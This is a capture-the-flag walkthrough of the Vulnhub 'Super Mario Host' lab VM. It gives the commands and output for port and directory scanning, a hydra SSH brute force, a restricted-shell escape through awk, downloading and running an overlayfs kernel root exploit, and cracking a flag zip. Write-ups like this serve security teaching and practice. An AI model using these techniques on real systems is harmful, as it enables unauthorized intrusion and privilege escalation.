Vulnhub - Super Mario Host

Hi all, Let’s pwn it!

You can find the machine there > Super Mario Host

Enumeration/Reconnaissance

Let’s start always with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ ip=192.168.1.6
$ nmap -sC -sV -p- -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-26 00:44 EEST
Nmap scan report for mario.supermariohost.local (192.168.1.6)
Host is up (0.0010s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 1c:97:c0:06:3b:cb:4f:6f:0f:65:8d:37:82:c4:23:59 (DSA)
|   2048 45:2d:fe:04:bb:98:ed:00:d7:7b:36:da:8f:cf:44:1c (RSA)
|   256 09:5c:25:9d:5c:54:ae:8d:90:e3:44:9b:5e:a1:4d:e0 (ECDSA)
|_  256 c9:d5:6a:32:53:ab:8a:43:74:4b:85:fb:a0:ba:40:52 (ED25519)
8180/tcp open  http    Apache httpd
|_http-server-header: Apache
|_http-title: Mario
MAC Address: 00:0C:29:DF:8C:2E (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

When we visit the site, we get the default nginx page :

Let’s run gobuster on it.

1
2
3
$ gobuster dir -q -u http://$ip:8180/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -o gobuster1.txt
/vhosts (Status: 200)
/server-status (Status: 403)

/vhosts has a virtual host file :

1
2
3
4
5
6
7
8
9
10
11
<VirtualHost *:80>

	ServerName mario.supermariohost.local
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/supermariohost
	DirectoryIndex mario.php

	ErrorLog ${APACHE_LOG_DIR}/supermariohost_error.log
	CustomLog ${APACHE_LOG_DIR}/supermariohost_access.log combined
 
</VirtualHost>

ServerName mario.supermariohost.local is the domain, let’s add it at /etc/hosts

1
2
$ cat /etc/hosts
192.168.1.6     mario.supermariohost.local

Perfect, now if we browser the website with the domain name we can see a different page :

Let’s run gobuster on it.

1
2
3
4
$ gobuster dir -q -u http://mario.supermariohost.local:8180/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt -o gobuster2.txt
/mario.php (Status: 200)
/command.php (Status: 200)
/luigi.php (Status: 200

I did some enumeration on them & the only things i found useful are the usernames mario & luigi we can do SSH brute force with them.

We should craft first a wordlist using john, i’ll use the Wordlist rule on the 2 usernames.

SSH brute force - Shell as luigi - Bypassing limited shell

1
2
3
4
5
6
7
8
$ touch usernames.txt
$ printf "mario\nluigi" > usernames.txt 
$ john -wordlist:usernames.txt -rules:Wordlist -stdout > wordlist.txt
$ hydra -L usernames.txt -P wordlist.txt $ip ssh

[DATA] attacking ssh://192.168.1.6:22/
[STATUS] 97.00 tries/min, 97 tries in 00:01h, 114 to do in 00:02h, 16 active
[22][ssh] host: 192.168.1.6   login: luigi   password: luigi1

` Let’s login in!

1
2
3
4
5
$ ssh luigi@$ip
luigi@192.168.1.6's password: 
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
luigi:~$ 

We’re in a limited shell :

1
2
luigi:~$ echo $SHELL
*** forbidden path: /usr/bin/lshell

Let’s check what command we can run :

1
2
luigi:~$ ?
awk  cat  cd  clear  echo  exit  help  history  ll  lpath  ls  lsudo  vim

We can exploit awk and open a normal bash/sh shell.

1
2
3
luigi:~$ awk 'BEGIN {system("/bin/bash")}'
luigi@supermariohost:~$ whoami
luigi

Kernel privilege escalation

After lot of enumeration, i found nothing. I usually avoid to exploit old kernel versions, but on this box it’s the only way to gain a root shell. So let’s check kernel version :

1
2
3
4
luigi@supermariohost:~$ uname -a
Linux supermariohost 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
luigi@supermariohost:~$ uname -r
3.13.0-32-generic

Because it’s an old box, we can see uses a really old kernel. Let’s search for possible exploits with searchsploit.

1
2
3
4
5
$ searchsploit 3.13.0
---------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                    |  Path
---------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation                              | linux/local/37292.c

This seems perfect, let’s download it on target box & compile it.

1
2
3
4
5
6
7
8
9
10
11
12
luigi@supermariohost:/tmp$ wget -q https://www.exploit-db.com/download/37292 -O root.c
luigi@supermariohost:/tmp$ gcc root.c -o root
luigi@supermariohost:/tmp$ chmod +x root; ./root
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),112(lshell),1001(luigi)

Cracking .zip & grab the flag

Now the challenge isnt over, we can see under /root directory a .zip :

1
2
# ls
Desktop  Documents  Downloads  Music  Pictures	Public	Templates  Videos  flag.zip

Probably we have to crack it & grab the flag, let’s move it to /var/www/html so we can download it.

1
# mv flag.zip /var/www/html

In our box now :

1
2
3
4
5
$ wget -q $ip:8180/flag.zip
$ file flag.zip 
flag.zip: Zip archive data, at least v2.0 to extract
$ unzip flag.zip 
Archive:  flag.zip

We have to crack it, i’ll use fcrackzip :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt flag.zip 


PASSWORD FOUND!!!!: pw == ilovepeach
$ unzip -P ilovepeach flag.zip 
Archive:  flag.zip
  inflating: flag.txt                
$ cat flag.txt 
Well done :D If you reached this it means you got root, congratulations.
Now, there are multiple ways to hack this machine. The goal is to get all the passwords of all the users in this machine. If you did it, then congratulations, I hope you had fun :D

Keep in touch on twitter through @mr_h4sh

Congratulations again!
								
mr_h4sh

awesome box! brings back lot of memories.